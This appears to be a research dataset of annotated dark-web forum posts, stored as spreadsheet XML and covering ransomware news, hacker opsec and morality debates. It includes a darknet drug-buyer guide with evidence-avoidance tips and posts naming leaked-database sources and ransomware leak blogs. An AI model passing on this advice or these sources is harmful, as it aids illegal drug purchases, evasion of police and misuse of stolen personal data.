that egregor and sekhmet threat actors have since inserted maze ransomware code into their variants.;;coveware thus named egregor the ���heir apparent.���;;notably, egregor recive healthcare technology, analytics, and engagement vendor, to its dark web blog. brett callow, a threat analyst with emsisoft, recently told healthitsecurity.com that the threat emerged in september.;;���egregor appears to be a spin-off of sekhmet, albeit far more active,��� callow said. ���and like sekhmet and multiple other groups, the actors behind egregor exfiltrate data and use the threat of its release as additional leverage to extort payment. the group���s claimed victims include barnes and noble, ubisoft, a subsidiary of berkshire hathaway, a medical equipment manufacturer, and a hospital.���;;���ransomware attacks on healthcare providers and the healthcare supply chain have continued unabated through the pandemic and represent a significant risk to patients,��� he added. ���unfortunately, there is no reason to believe that ransomware will become less of a problem any time soon and it���s almost certain that the healthcare industry will continue age the threat of releasing exfiltrated data as a ���monetization conversion kicker.��� in the past, ransomware victims could restore data from adequate backups. but with the increase in data exfiltration, even victims with restorable backups are compelled to engage with the attackers to see what data was taken from their network.;;further, data exfiltration may have reached a tipping point: coveware has seen a ���fraying of promises of the cybercriminals,��� even when a victim decides to pay the attacker with assurances that the data will be deleted.  researchers have publicly observed several hacking groups publicly doxing victims, even after a ransom demand payment. some have even demanded a second extortion payment from victims that previously paid to have the data deleted and not leaked.;;the stats are concerning, particularly in healthcare, where several extorted providers have admitted to paying the ransom demand to ensure the stolen data is returned. recent examples include thea san francisco and the massive blackbaud ransomware hack. coveware data shows sodinokibi re-extortion efforts occur weeks after the initial incident, with later threats to post the same data set. meanwhile, maze, egregor, or sekhmet leak data before the victim understood their data was taken from their network.;;netwalker and mespinoza also posted data from companies that previously paid for the data not to be leaked. but perhaps most concerningly, conti threat actors actually show victims fake files as proof the stolen data was deleted.;;conti threat actors have repeatedly attempted to extort healthcare providers, often nonprofits that provide low-cost mental healthcare services, including riverside community care in massachusetts, a behavioral healthcare and human services provider, including child and family services, and west end medical center, now operating as family health centers of georgia, a nonprofit community health center and primary care medical home.;;while there are always valid reasons to pay ransom demands in an effort to prevent data from being leaked, coveware researchers stressed that there are elements breach victims should first consider.  ���the data will not be credibly deleted. victims should assume it will be traded to other threat actors, sold, or held for a second, future extortion attempt,��� researchers wrote. ���unlike negotiating for a decryption key, negotiating for the suppression of stolen data has no finite end.���;;���stolen data custody was held by multiple parties and not secured. even if the threat actor deletes a volume of data following a payment, other parties that had access to it may have made copies so that they can extort the victim in the future,��� they added. ���the data may get posted anyway by mistake or on purpose before a victim ca</t>
  </si>
  <si>
    <t>news articule on the increase in ransomware infiltration and value on ransomware payments</t>
  </si>
  <si>
    <t>cea613d467e3a3257548</t>
  </si>
  <si>
    <t>50% of Ransomware Attacks Lead to Data Exfiltration; Payments Hit $234K</t>
  </si>
  <si>
    <t>{'extortion': 6, 'sodinokibi': 2, 'ransomware': 10}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;beebe healthcare is the latest delaware health care system to announce it was impacted by the blackbaud data breach. the information of 58,000 beebe patients and donors was exposed in the attack, to include names in combination with date of birth, clinician name, date of screening, visit date and/or the department related to medical services.;;no social security numbers or financial account numbers were impacted. blackbaud provides cloud computing systems for nonprofit organizations. the charleston, south carolina-based company discovered in may 2020 it had suffered a ransomware attack, exposing the information of millions of individuals.;;blackbaud paid the cybercriminal���s demand and confirmed the data was destroyed, as well as hired experts to continu"monitor the dark web" to ensure the data is not shared, according to beebe. "the security of our community���s personal information is of the utmost importance to us and we deeply regret this incident and any inconvenience this data breach of blackbaud���s system may " said beebe spokeswoman mary green.;;beebe was notified its information was impacted by the attack in november and conducted its own investigation before announcing it to the public dec. 30. "this process took significant time and included obtaining a copy of the impacted data from blackbaud to further investigate the incident," green said.;;two other delaware health care systems, bayhealth and christianacare, announced they were affected last year. christiana announced in september almost 27,000 of its patients and donors were impacted. in november, bayhealth indicated 78,000 of its patients and donors were impacted.;;as of nov. 3, blackbaud has been named in 160 individual claims and 23 class action lawsuits related to the incident, according to the company's third quarter securities and exchange commission report.</t>
  </si>
  <si>
    <t>news article on the breach of delaware healthcare (part of blackbaud breach)</t>
  </si>
  <si>
    <t>5b706f37a609a488e7e1</t>
  </si>
  <si>
    <t>58,000 Beebe Patients' and Donors' Data Breached in Blackbaud Ransomware Attack</t>
  </si>
  <si>
    <t>paris wrote about these topics already.;;http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/6b8c56e3f95f31bbdf71;;http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/8422108e4abf4a32de69/#c-4cf8dad31f6d918f2c</t>
  </si>
  <si>
    <t>extention to the previous news thread</t>
  </si>
  <si>
    <t>/u/[deleted]</t>
  </si>
  <si>
    <t>19/06/2021 09:40</t>
  </si>
  <si>
    <t>/d/CafeDread</t>
  </si>
  <si>
    <t>c33fea266afd89531635</t>
  </si>
  <si>
    <t>A  Moral Debate</t>
  </si>
  <si>
    <t>0 days 00:06:00</t>
  </si>
  <si>
    <t>4 days 13:40:00</t>
  </si>
  <si>
    <t>valid, but, not 100% identical. paris is discussing principles behind site policy, i'm inviting users to discuss their principles.;;this statement "they are things where the harm is done by one person to an individual who is generally innocent", seems a bit iffy... i mean, theft is a type of harm done to an innocent, but i get that they are talking about phyisical harm that requires medical intervention, if possible.;;this leads to the question, when we talk about "harm", are we muddying the water between "harm reduction", e.g.: selling bad drugs or giving false advice, and is lying and manipulating ok as long as it's to do with shady transactions or theft?;;i get that dread unwittingly became dw reddit.;;some useful pushback against paris from pygmalion:;;;;/u/pygmalion;1 points;6 months ago*;all the rules you have can be derrived from the non-aggression principle (nap), also called the non-aggression axiom. it is a concept in which "aggression", defined as initiating or threatening any forceful interference with either an individual or their property, is bad.;i feel as though at this point you need to step up your philosophy game because you have a large user base looking for guidance,;/u/paris;:p;;all the rules you posted can be derrived from that one higher axiom, but it also includes many other things that you may not have considered.;it's easier to do maths with axioms.;;"anything explicitly harmful is prohibited" leaves too much room for interpretation and technically "dangerous" drugs would fall into that category as well. everything can be used in a harmful way.;;;&gt;;/u/agentorange230;1 points;6 months ago*;i agree with the criticism in your third paragraph, but the current set of rules doesn't seem to derive from the axiom "initiating or threatening any forceful interference with either an individual or their property, is bad". wouldn't that ban some of the posts on;/d/hacking;and allow doxxing?;;&gt;&gt;;/u/pygmalion;1 points;6 months ago;yes, i am proposing that axiom. i know it is not derrived from that.;;no, it would not ban;/d/hacking;because tools are important to understand in order to harden your own services. it is like owning a gun. you can go on a massmurder but you can also protect your family. same with;/d/hacking;. the tool is not evil. the person using it can be.;;we now have a scenario where raas is categorised as terrorism, which throws this point a bit. we're no longer just talking about "innocently scamming" a few people out of "only money", but disrupting food and energy systems, and it starts to stray into geopolitics potentially, with hackers being offered up as pawns like nuclear arms trading. it seems more to be a practical, opsec and admin overhead issue.;;;;/u/trailerhoodhero;-1 points;6 months ago;what if i was looking for a 9mm suppressor?? technically.. not a weapon.. and i would pay good!;;&gt;;/u/paris;a 2 points;6 months ago;yes and i only want the material to build a gas bomb. it's not that i'm going to do it but i just want the parts i'm missing out of it. just in case i do need it, you know?;;if you want a suppressor buy one legitimately. if you try to buy one on the darknet you will get either get scammed, pay a high premium, and/or get a knock on the door by the police. at the end of the day you are better off buying it legitimately.;;;the practical point is very reasonable, dressing it up in morality seems less so.;you can buy any number of "deadly weapons" from your local hardware store, with no issue at all.;the obvious implied problem is the idea of people wanting to buy accessories that really only have a singular purpose, and to do it anonymously, or associating a platform with it, which is more to do with harming the platform than a potential target.;;one of the problems with paris's position is that they appear to be applying an idealistic set of principles that might work in parts of the developed world, but are detached from reality in much of the world. it would be unfair to call the comments naive or disingenuous, but they certainly appear to be left-leaning, or "liberal" in the american sense of the word.;;if you can't legitimately buy a gun generally there is reasonable harm reduction reason for that;;you can't legitimately buy a gun in indonesia for example, but if you are "caught" by police, and are poor, and accused of burglary, the accuser can pay the police a very modest sum for you to be shot in the head, and your body dumped in a stream. this i know from real life. alas, most of the world is like that. in many parts of the world there is not a legitimate reason for preventing you from doing an awful lot of things, ranging from owning guns, owning property, owning rights, owning free expression, or making decisions based on those things.;i think there are more supportable reason for banning weapon-related posts, and that's simply because it attracts all the wrong kinds of attention that makes other stuff more difficult to do. it's more of a general opsec and admin issue i suspect.;;i think this thread is still a useful and worthwhile one to have, because it's not debating site policies, but member's personal "policies", as it were, so more of a kind of survey as well as debate, which does not undermine the rules.;;i'm more interested in the grey area over social engineering and the various forms of lying and manipulation that underpin a lot of the activities or aspirations of people on this site, usually the people interested in hacking and scamming.;the value of exploring this is to help people avoid problems by thought experimenting or wargaming how they would attack themselves, to help them design how to defend or protect themselves.</t>
  </si>
  <si>
    <t>debate on site policy and the morality of hacking heathcare facillities, whether it should be allowed and are causing harm</t>
  </si>
  <si>
    <t>/u/footsteps</t>
  </si>
  <si>
    <t>19/06/2021 10:35</t>
  </si>
  <si>
    <t>0 days 00:55:00</t>
  </si>
  <si>
    <t>{'raas': 1}</t>
  </si>
  <si>
    <t>no matter how you look at this coin, both sides do not give their victims a choice.;;let me steal 100k in credit from you &amp; then come here &amp; tell us how violated you feel.;;if the punishment for rape was getting ones dick cut off i'm betting we would have less of it.;;as i stated at the very top, death to any sicko pedophile who harms a child.;;and that is pretty damn black &amp; white, no grey whatsoever!!!</t>
  </si>
  <si>
    <t>debate on site policy and the morality of hacking halthcare facillities, whether it should be allowed and are causing harm</t>
  </si>
  <si>
    <t>/u/We_Are_9000</t>
  </si>
  <si>
    <t>19/06/2021 21:12</t>
  </si>
  <si>
    <t>0 days 00:10:00</t>
  </si>
  <si>
    <t>you're repeating yourself and missing the point. as a technical aside, stealing that size credit that is also a mortgage seems not a practical example. having said that, banks, governments, companies do it often.</t>
  </si>
  <si>
    <t>19/06/2021 21:33</t>
  </si>
  <si>
    <t>0 days 00:03:00</t>
  </si>
  <si>
    <t>if the lsd is poison, some may say you took a foolish risk, and it's your fault; others on the "harm reduction" side will say the poisoner is evil: perspective rules.;;on the phone side, this is not a thing you put in your body, but it is a sale that is lost to a company that might cost a job, a mortgage, a credit rating etc...</t>
  </si>
  <si>
    <t>19/06/2021 21:34</t>
  </si>
  <si>
    <t>0 days 00:01:00</t>
  </si>
  <si>
    <t>also most money lost is done through banks which can easily replace any money lost. do you know how much these control? mad over this that and the third but the banks will easily take your home or car if you can't make a payment. no matter what position your in or how hard-working.;;all this damn money can easily be recompensated that's lost from carding. and what's the trauma left over? to make sure you protect your fucking bank and be more secure with your money? what's the trauma behind rape and all that other shit? not trusting people becoming anxious etc etc etc fucking up your whole social life while carding teaches you to be defensive and secure about your information.;;it's not the same i refuse to believe what you say.</t>
  </si>
  <si>
    <t>/u/kelloggss</t>
  </si>
  <si>
    <t>23/06/2021 23:14</t>
  </si>
  <si>
    <t xml:space="preserve">;read this article on deepwebfeed;;leak shows that, like the rest of the ransomware scourge, cl0p isn't going away. a week after ukrainian police arrested criminals affiliated with the notorious cl0p ransomware gang, cl0p has published a fresh batch of what���s purported to be confidential data stolen in a hack of a previously unknown victim.;;source: arstechnica;;ars won���t be identifying the possibly victimized company until there is confirmation that the data and the hack are genuine. if genuine, the dump shows that cl0p remains intact and able to carry out its nefarious actions despite the arrests. that suggests that the suspects don���t include the core leaders but rather affiliates or others who play a lesser role in the operations.;;the data purports to be employee records, including verification of employment for loan applications and documents pertaining to workers whose wages have been garnished. i was unable to confirm that the information is genuine and that it was, in fact, takn the company, although web searches showed that names listed in the documents matched names of people who work for the company.;;company representatives didn���t respond to a phone call seeking comment. cl0p members didn���t respond to emails sent to addresses listed on the group���s site on the dark web.;;an existential threat;;for almost a decade, ransomware has grown from a costly inconvenience into an existential threat that can shut down hospitals and disrupt gasoline and meat supplies. under pressure from the biden administration, the us justice department is prioritizing federal ransomware cases. biden also raised concerns with russian president vladimir putin about the proliferation of ransomware attacks from russian-speaking groups, such as cl0p.;;last week���s apprehension by ukrainian police of six people affiliated with cl0p was seen as a coup in some circles because it marked the first time a national law enforcement group has carried out mass arrests involving a ransomwaeporter lily hay newman observed, the crackdown is unlikely to ease the ransomware epidemic until russia itself follows suit.;;the new leak confirms the limits of current ransomware response. much of the flimsiness stems from the decentralization of the ransomware economy, which rests on two crucial but independent entities. the first is the group that maintains the ransomware itself and often some of the internet infrastructure it runs on.;;the second entity is the team of hackers that leases the ransomware and shares any revenue generated with the ransomware maintainers. often, one group has little or no knowledge of the other, so the shutdown of one has no effect on the other.;;the fight continues;;compounding the difficulty law enforcement faces, many of the groups reside in russia or other eastern european countries that have no extradition treaties with the us.;;cl0p was first spotted in early 2019. recent targets have included oil company shell, international law firm jones day, us bank flagstar, and several us universities including stanford and the university of california. often, affiliated hacker exploit vulnerabilities in the accellion file transfer appliance. cl0p has also been observed operating broad malicious email campaigns to identify potential corporate victims. in many cases, the campaigns use data stolen from existing victims to better trick customers, partners, or vendors into thinking that a malicious email is benign.;;the ability of cl0p to post leaked documents following last week���s arrests suggests that the suspects weren���t core members and instead were either affiliates or, as intel 471 told security reporter brian krebs, ���limited to the cash-out and money laundering side of clop���s business only.��� and that means the fight against this group and the internet scourge it���s a part of will </t>
  </si>
  <si>
    <t>news articule on Cl0p after some affiliated were arrested</t>
  </si>
  <si>
    <t>30/06/2021 17:58</t>
  </si>
  <si>
    <t>7cb56e24c70e57122397</t>
  </si>
  <si>
    <t>A Week After Arrests, Cl0p Ransomware Group Dumps New Tranche of Stolen Data</t>
  </si>
  <si>
    <t>0 days 00:14:00</t>
  </si>
  <si>
    <t>{'ransomware': 12}</t>
  </si>
  <si>
    <t>first of all,  i see part of your post as confusing correlation and causation.;;yes, of course, using mobile app wallets is shit opsec, no discussion needed on that, but is that reason they were busted, or you just combining 2 facts you know about the busts and bringing the conclusion  ?;;unicvv and luxsocks were being owned by 4 people. all 4 of them were deanonymized by fbi and had indicament against them back in 2018, when infraud was busted.  they were having many other opsec blunders, mostly because they were feeling safe in russia, so yes, why not they also had shit unsafe wallets on their unsafe phones. but that was not the reason, at least unicvv and lux were busted;;btw and others, trumpsdumps, briansclub and fe  were having indicaments since the fall of in fraud.;;we don't have nearly enough info to say that mobile phone wallets were reason for bust.;all of the revil guys who were busted were deanonymized by fbi, and given data to russians.;;i mean, not all of them, but for those where some info about busts you can find, is usually feeling safe within the russia and reason for being deanonymized is some email/jabber/telegram/wallet which they made with shit opsec before becoming big.;;we should not be jumping on conclusions. i mean, few months ago, lalartu's exodus wallet was hacked and 2.5 milion seized. that is as much as we know. maybe it was targeted infection, maybe his device was backdoored from the begining. or maybe is even pure stupidity, like saving private keys at unsafe place ( don't ever exclude factor of mistake and stupidity, fe, kaseya was unlocked by the wrong copy paste of mr rabotnik, the mastermind of attack ).;should we jump on conclussions ? what was the weakest point adversary used ?;;btw, for those who don't know, lalartu was biggest 'attention whore' of ransomware scene. first one who started ordering rap songs about his hacks, holding half million on forum wallet for showing off and so on.;;;from revil, 15 was usted in russia, 3 in ukraine, 2 in poland, 1 in kuwait and 3 in romania.;this includes coders, spraders, network pentesters, also some initial accesses brokers alligned with revil.;in 2020-2021  there have been in total 65-70 people as members of revil for some time.;;so most of them are still on freedom;;;;for phones, yes, in general, phones are much less safe option than pc.;but we should not generalize. phone with graphene os, without sim, with double vpn, all apps opensource;or laptop with windows 10 with all microsoft shit trackers included. on home internet.;;which one is the obvious choice ?;;even if you run whonix on it;every whonix is as safe as it's host os, or less;it can not be more</t>
  </si>
  <si>
    <t>Debate on a post regarding how certain russians sites were taken down, disagrees with the original post using examples from reEvil</t>
  </si>
  <si>
    <t>/u/tito33</t>
  </si>
  <si>
    <t>19/02/2022 14:28</t>
  </si>
  <si>
    <t>/d/OpSec</t>
  </si>
  <si>
    <t>2dc9bd7d7954669c10a6</t>
  </si>
  <si>
    <t>A detailed breakdown of the Russian sites they took down &amp; cell phones wallet apps</t>
  </si>
  <si>
    <t>0 days 03:13:00</t>
  </si>
  <si>
    <t>134 days 10:22:00</t>
  </si>
  <si>
    <t>{'revil': 2, 'ransomware': 1}</t>
  </si>
  <si>
    <t>thanks for the read, i wonder what new sellers we'll see come to the limelight in the next few weeks/months, and if they'll have any longevity or if things are simply too hot.</t>
  </si>
  <si>
    <t>Complmented the original post shoiwng interest in the information provided</t>
  </si>
  <si>
    <t>/u/Dewie</t>
  </si>
  <si>
    <t>20/02/2022 03:49</t>
  </si>
  <si>
    <t>0 days 13:21:00</t>
  </si>
  <si>
    <t>thank you;/u/dewie;... i wonder what creative ways that have to go to even surface again.</t>
  </si>
  <si>
    <t>/u/HeadJanitor</t>
  </si>
  <si>
    <t>20/02/2022 18:06</t>
  </si>
  <si>
    <t>0 days 14:17:00</t>
  </si>
  <si>
    <t>i love the content you bring here. you always bring a powerhouse -- worth enough to read twice just to know i got the depth of it.</t>
  </si>
  <si>
    <t>20/02/2022 18:14</t>
  </si>
  <si>
    <t>0 days 00:08:00</t>
  </si>
  <si>
    <t>thanks for being a part of what we do. we're all one team down here.</t>
  </si>
  <si>
    <t>20/02/2022 18:17</t>
  </si>
  <si>
    <t>as someone who comes from a background remotely related to computer security, more certainly i am working as a web developer, and as someone who overwhelming curiosity pertains to, i want to ask this to learn more about how darknet works from people who are feel like talking about this right now.;;how comfortable do you feel with the amount of money you receive from your activities? would you want to simultaneously maintain other sources of income, a normal job for example, except malware making and why or why not?</t>
  </si>
  <si>
    <t>web developer interested in learning more about darknet</t>
  </si>
  <si>
    <t>information (request)</t>
  </si>
  <si>
    <t>/u/nmp</t>
  </si>
  <si>
    <t>23/09/2022 09:09</t>
  </si>
  <si>
    <t>5268e7254c082350ec4d</t>
  </si>
  <si>
    <t>A little quiz for malware developers</t>
  </si>
  <si>
    <t>6 days 18:24:00</t>
  </si>
  <si>
    <t>lad, i just want some ransomware</t>
  </si>
  <si>
    <t>individual interested in ransomware</t>
  </si>
  <si>
    <t>/u/33monkey8</t>
  </si>
  <si>
    <t>23/09/2022 13:16</t>
  </si>
  <si>
    <t>0 days 04:07:00</t>
  </si>
  <si>
    <t>;comfortable;;yes;;not all eggs in one basket</t>
  </si>
  <si>
    <t>responding to information request post</t>
  </si>
  <si>
    <t>/u/zexdac</t>
  </si>
  <si>
    <t>23/09/2022 13:17</t>
  </si>
  <si>
    <t>its always good to keep a steady paycheck with a real job, unless you're making millions</t>
  </si>
  <si>
    <t>/u/56Cash</t>
  </si>
  <si>
    <t>23/09/2022 15:57</t>
  </si>
  <si>
    <t>0 days 02:40:00</t>
  </si>
  <si>
    <t>over the years in my experience bh work can be a bit lumpy so i also do regular paid work from time to time. contract type stuff basically.;;always remember that its not just about getting paid but cleaning your profits too which is extra work and expense.</t>
  </si>
  <si>
    <t>/u/Z0ltar</t>
  </si>
  <si>
    <t>27/09/2022 11:00</t>
  </si>
  <si>
    <t>2 days 17:16:00</t>
  </si>
  <si>
    <t>i would definitely like to make more, and am always searching for ways to improve this. i have to supplement my income with programming and software development for money, but not for too much longer.;;i agree with the person who said not to put all eggs in one basket.</t>
  </si>
  <si>
    <t>/u/darkstar333</t>
  </si>
  <si>
    <t>30/09/2022 03:33</t>
  </si>
  <si>
    <t>2 days 16:33:00</t>
  </si>
  <si>
    <t>hi!;;here's a few alternatives, note that raidforums is the biggest leak site on the planet:;snusbase, dehashed, weleakinfo, deepsearch, pwndb.;;most of these are clearnet, so i'd say you should sort out how to stay on clearnet securely.;;you can also monitor raas blogs for those extra hot leaks.;;with respect,;humanpie, a professional pie of humans</t>
  </si>
  <si>
    <t>Indivdual recommending raas blogs as a replacement for raidforums to find information on database leaks</t>
  </si>
  <si>
    <t>/u/HumanPie</t>
  </si>
  <si>
    <t>14/09/2021 20:33</t>
  </si>
  <si>
    <t>/d/HiddenService</t>
  </si>
  <si>
    <t>daf0ba9094eb578851b1</t>
  </si>
  <si>
    <t>A raidforums alternative on the darknet?</t>
  </si>
  <si>
    <t>0 days 00:33:00</t>
  </si>
  <si>
    <t>15 days 02:22:00</t>
  </si>
  <si>
    <t>then stick to pwndb and .onion raas blogs.</t>
  </si>
  <si>
    <t>Same indivdual recommending raas blogs after the original user expressed inrrest on stayin on the darknet but doesnt feel safe using raidforums</t>
  </si>
  <si>
    <t>15/09/2021 00:25</t>
  </si>
  <si>
    <t>0 days 00:44:00</t>
  </si>
  <si>
    <t>if you are looking for an alternative hacking forum we have a subsection at alphabay. we also will soon be launching a more private subcommunity related to hacking/security and one for malware/botnets (vxcode). right now it is still in the beginning rebuilding so activity is slower but we are very focused on what you are looking for. other alternatives are dmglab or exploit.;;thank you.</t>
  </si>
  <si>
    <t>/u/DeSnake</t>
  </si>
  <si>
    <t>15/09/2021 02:01</t>
  </si>
  <si>
    <t>0 days 01:24:00</t>
  </si>
  <si>
    <t>raas blogs:;/post/e5b05a653af96332d0ab</t>
  </si>
  <si>
    <t>Individual providing a link to raas blogs</t>
  </si>
  <si>
    <t>29/09/2021 22:14</t>
  </si>
  <si>
    <t>14 days 20:13:00</t>
  </si>
  <si>
    <t>although,  most of these things are self-explanatory and can be avoided with a very little common sense, users make these mistakes frequently.   this post is an attempt to address all such novice mistakes, which would help you saving your coins while ordering drugs on dnms. please read this post and if you've any questions, feel free to contact us.;;;;don't ignore vendor policy.;;if you ignore vendor policy, staff won't help you. before making a purchase, make sure you've read vendor's policy. read about their refund and reship policy. you should also check listing very carefully including listing���s terms and shipping information. only order after you're comfortable with vendor's policy/terms and conditions. some vendors offer 50% reship, some vendors don���t even refund to new buyers, when you order from any vendor, it���s unwritten rule that you���ve accepted vendor���s terms and conditions.;;;;don���t open a ticket complaining about direct deals.;;you should never dealt the vendor. if you're scammed,  staff won't bhelp you.  markets don���t have any control over direct deals, meaning markets can���t refund you. in some cases, markets might even ban you for such mistakes.  when sellers  share their external contacts with you and ask you to deal outside, in most of the case cases, they are scammers. avoid and report them.;;;;dispute the order before auto-finalisation period.;;if you���ve an open order and vendor has marked it shipped/completed and you���re still waiting for the order. please dispute it before it���s finalised. if order is  finalised, your right to dispute is lost. creating tickets about such orders will not help you, staff can only help when order is disputed timely.;;;;vendor marked item ���shipped��� and you didn���t dispute it.;;please understand that if vendor has marked item ���shipped���, this doesn't mean vendor has actually ���shipped��� it. don���t think you���ll rece. take escrow seriously,  some vendors ask you to finalise early,  never act upon on their advice's. if you finalise it and you are scammed, staff won���t help you.;;;;staff have no control over fe orders.;;if you've bought from a vendor with fe permissions. communicate with the vendor about your issue. staff can only revoke fe rights or ban the vendor but can���t refund or help you.;;when you order from ven"fe" permissions, you trust a vendor over the market, fe permissions are given to very trusted vendors but don't think everything will always work, ordering drugs online always have considerable risks, things can go wrong, fe orders you are also accepting the risk.;;;;;;general buyer's ethics;;when you order drugs online, either you use a market or you deal directly with the vendor, you're making a contract with the other party. although, if you're someone who follow rules, you won't be here on darknet, however, there are some expected ethical  responsibilities which make things smooth for everyone. we���ve some unspoken but fundamental ethics on darknet. here are some ethics, which a buyer must follow.;;;;if your mail was discovered and item was seized;;nothing is risk-free, there is always a risk, when you order drugs online, you automatically accept the risk. sometimes, your mail can be discovered, it���s not usually a vendor���s fault, don���t go mad of them.  they didn���t want . get over with it, don���t try to blackmail the vendor.;;;;if you���re connected with mafia, cartels and bikers gang;;that���s your personal life and we don���t have anything to do with that, however, don���t try to blackmail or  threat market staff and market vendors.  no body actually gives a fuck about these threats and  this isn���t the first time market staff and vendors are threatened with such things, these never work for you.;;;;if you���re here since silk road,  level 9 buyer on empire and spend over a million on darknet markets.;;actually, this is an awesome  cv and nice nice to meet you. thanks for helping the community. however, if you think you could use these things to influence staff members and/or get some favours from the markets(aka tolerate you and your bad behavior), you���re wrong. if you���re a good sport, everyone will love you, even if you���re the first time buyer or even if you don���t have money. empire is gone and s time. however, none of those markets tolerated bad behavior. creative criticism or insults are always accepted.;;;;a little patience is requested.;;yes, you paid extra for tracking orders. however, some vendors are very cautious about new buyers, any buyer can be le. vendor isn���t scamming you if they are taking some time before giving you tracking details. patient is the key. if auto-finalisation timer is near and vendor still haven't provided tracking details, dispute the order.;;another issues is, lack of communication or ignoring your messages. yes, some vendors do it, these are big vendors and process several orders daily on all markets combined.   patient is recommended here. if  auto-finalisation timer is near, neither vendor has responded to you nor your item has arrived, dispute the order.;;;;do not scam, no not spam.;;vendors are here to make money and earn a decent living. don���t try to scam them. if you lack coins to purchase drugs, just ask the vendor for a discount. don���t ;;if you���re waiting for your product, don���t spam the vendor and market tickets. don���t rant on forums against the vendor.;;;;;;now, some tips how vendors scam you and how you could avoid it;;while, we're on this topic today, lets discuss some common vendor scam tactics, if you know their tactics, you can also avoid getting scammed. simple principle of reserve engineering.;;;selective-scamming;;selective-scamming is very common and few vendors have expertise in it. these vendors can manipulate you and staff members. there are many types of selective-scamming, we will discuss few very common tactics of selective-scamming with you.;;;;sample arrived but actual order disappeared.;;vendors send small value orders or free samples to win trust and scam you for big/large/bulk orders. read vendor���s review, if you suspect a seller,  don���t order.;;;;bad quality was delivered.;;some vendors just sent you ���bunk���. if you���re a new buyer, you won���t be abl you should know about drugs you order and you can explain about the product quality when staff asked you about it.;;;;quantity was missing;;some vendors don���t send you what you had paid for. scammers prey for new buyers.  this can be avoided if you pay attention to listing terms and conditions before ordering and reading seller���s previous feedbacks.  do a proper research before ordering.;;;;few items were missing;;you���ve purchased multiple items. vendor sent few items and didn���t sent some of those. you���re able to prove that you got some of your items but you can���t prove that you didn���t get other items. selective-scammers do it with new buyers. don���t order too many drugs until you know how things work here, gain some experience before going for bigger orders or risking your money.;;;;discounts on direct deals;;very common,  a vendor convince you for a direct deal. you were asked contact in isolated envinorment, vendor  uses persuasive language tpunts on the products, don���t fall for these scams.;;;;blackmailing/extortion;;some  unethical  scammers, after getting your address will blackmail you for money. such dealers will ask you to finalise early and will scare the shit out of you. don���t worry about them, report to the markets. always, pgp encrypt your addresses, by doing that you avoid any chance of substantial evidence against you.  don���t order from unverified dealers,  check  ratings before you order. report such sellers  to market staff.;;;;delayed/fake tracking;;some sellers will avoid to give  tracking id with the justification that it���s for opsec. be patient with them, once you start suspecting, dispute the order and report the seller to market staff. vendors also take advantage of your naivety, they will provide you fake tracking id and will convince you to ���finalise the order���. don���t consider that such sellers aren���t scamming you. learn about fake tracking id and learn how mail dispute, vendor will ask you to settle the deal, either the vendor will offer 50% refund or 50% reship. in some cases,  vendor will offer 100% reship but won���t actually reship. again, don���t trust vendor���s words, contact  staff, be professional and staff might help you.;;;;don���t be naive;;vendors scam naive users. be smart as  you���re on darknet and are into a sketchy deal. use your common sense. don���t consider all completed/marked shipped items will be delivered to you. don���t trust vendors word. don���t share more than required information about yourself. learn about common scam tactics, read the darknet bible and learn as much as possible.;;;;;;thanks for reading this post, hope it will help some of you. there are still many things which are not covered in this post,  it will be a very long post and some of you will never read it.  we will try to make you more sma</t>
  </si>
  <si>
    <t>post covering common buyers mistake, vendor scam tactics and how to avoid such mistakes.</t>
  </si>
  <si>
    <t>/u/LeChacal</t>
  </si>
  <si>
    <t>/d/ASAP</t>
  </si>
  <si>
    <t>1b443a0788c984ba01a0</t>
  </si>
  <si>
    <t>A simple post covering common buyers mistake, vendor scam tactics and how to avoid such mistakes.</t>
  </si>
  <si>
    <t>354 days 06:27:00</t>
  </si>
  <si>
    <t>last night, a user on dread;/u/asapgothacked;gained lots of attention as he claimed that he hacked asap market.;;apparently after hacking the market, he tried to extort admins demanding a 30% cut for him to not post it publicly. when he didn't heard back from the admins he posted about the attack, how he was able to extract all the data which allegedly was unencrypted such as tickets history, videos of admin panel, all transactions including admin's as well, system logs, orders history and the ip address of the server.;;the user claimed to use a shell injection to exploit the server. a shell injection is a vulnerability which allows hackers to execute arbitrary os commands on the server which compromises the server completely, revealing the data and sensitive information about the server.;;this would give the attacker full control over the server meaning he could manipulate with all the data. and so the user claims to be able to change all support &amp; support-admin accounts, as well as create new accounts and give them the privileges of an admin or support.;;he also said that asap's admin doesn't know how to stop or divert the ddos attacks that has kept the market down for few days, and when the admin used cloudscale to stop ddos attacks which revealed some vulnerabilities through which he was able to inject a shell and gain access.;;according to the 'hacker' the data he has sums up to 95% of orders that took place on the asap market and he is going to sell the information on exploit soon, for proof though he posted some screenshots that showed various orders, tickets, admin's transactions, and logs. all of it which could;be accessed through a moderator's account. within minutes of this post, paris the co-admin of dread said the following:;;;/u/paris;;so let's take a look at this. we have another asshole trying to extort a market saying that he hacked them. did a server shell injection (ok) that only allows him to change the support and support admin accounts (wat).;;if it is truly a server shell injection he would have remote code execution. being that it looks like the support page is attached to the same codebase he would be able to dump the whole site and database if that was the case, including pwning the server. not just change the support and support admin accounts.;;ok so maybe he meant blind sql injection which only effects the permissions of the users in the support area. very convenient that is exactly what permissions a rogue support member would have. then he goes on to say that he has all this information, it would be bad, and the server ip is going to be on sale on exploit.im. i see no post about that on the exploit.im forum there.;;even in the more private areas not a single mention of asap market with its ip leaked.;allow me to break it down for you guys. the in all likelihood is a rouge support member. he is not to be believed. but this post will be kept up so i can reference it from another post. but i'm going to downvote it and hope that others do that too.;;;the user replied to paris;;"not rogue support. never have been. never will. you are providing information to people without any proof. at least i have proof of my claim paris. paris you need to remember that we have all piece of information of every transaction. every order. every deposit. every withdraw of this market. how you can say this market needs to be still used.;;;you right now are leaning on idea that we are support. we never was support. we hacked asap. you are saying asap is save to use (between the lines) while all use info is exposed. nice but your breakdown is false. i have respect for you paris. i realy do. but what you do now is dangerous. it is wrong. you are not right.";;;he attached some images as 'proof', the images though held nothing confidential that would prove his claims as the images were the same as he posted in his thread depicting transactions, tickets;all of which are available to a support member of the market.;;paris replied to his 'proof', saying:;;your "proof" is screenshots that a support moderator would have.;they are not good enough proof. if you did what you said you did you would have remote;code execution on the server. you would need that for the server ip leak.;;but you don't have that. it is shown from your message that you can only "control and change all support and support-admin accounts. which is fucking crazy to even mention if you have remote code execution. ya sure, but that's beside the point. if you said that you found an open sql injection which allowed any account to be 